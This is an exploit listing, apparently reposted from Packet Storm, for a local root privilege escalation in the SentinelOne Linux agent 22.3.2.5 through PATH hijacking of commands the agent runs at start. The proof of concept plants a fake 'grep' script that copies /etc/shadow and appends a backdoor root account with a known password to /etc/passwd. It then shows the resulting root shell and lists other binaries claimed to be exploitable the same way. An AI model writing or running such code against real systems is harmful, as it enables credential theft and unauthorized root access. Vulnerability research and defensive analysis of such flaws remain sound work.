Exploit for SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

Name: Exploit for SentinelOne sentinelagent 22.3.2.5 Privilege Escalation
Rating: 5 (162 reviews)
2022-12-07 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:170128
Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability  
Date: 12/06/2022  
Exploit Author: ouch_this_hurts  
Vendor Homepage: https://www.sentinelone.com/  
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas  
Version: 22.3.2.5  
Tested on: Ubuntu 22.04.x  
CVE: NA  
  
Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)  
  
Protips:  
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.  
- If you require me to use HackerOne, I'm not going to bother.  
- If you dont have a security.txt, how do you expect me to contact you?  
  
Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:  
  
Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!  
  
PoC below:  
1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.  
2. Create the following `grep` file in that directory and make sure its executable:  
  
```shell  
cat << SENTINELOOPS > /usr/local/bin/grep  
#!/bin/bash  
# I think I'll have the passwds pl0x  
cat /etc/shadow > /tmp/etc_shadow  
  
# password is password :)  
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd  
SENTINELOOPS  
  
chmod +x /usr/local/bin/grep  
```  
  
3. Wait for machine to reboot, login as `sentinel_oops:password` :)  
  
```  
$ su sentinel_oops  
Password:   
# whoami   
root  
```  
  
What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.  
  
So there are potentially other ways of privilege escalation via this "agent"?  
- `grep` as demonstrated above  
- `pgrep` examining the binary appears to be vulnerable  
- `xargs` examining the binary appears to be vulnerable  
- `cat` examining the binary appears to be vulnerable  
- `pgrep` examining the binary appears to be vulnerable  
- `ldd` examining the binary appears to be vulnerable  
- `lsmod` examining the binary appears to be vulnerable  
- `mksh` examining the binary appears to be vulnerable  
- `awk` examining the binary appears to be vulnerable  
  
[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)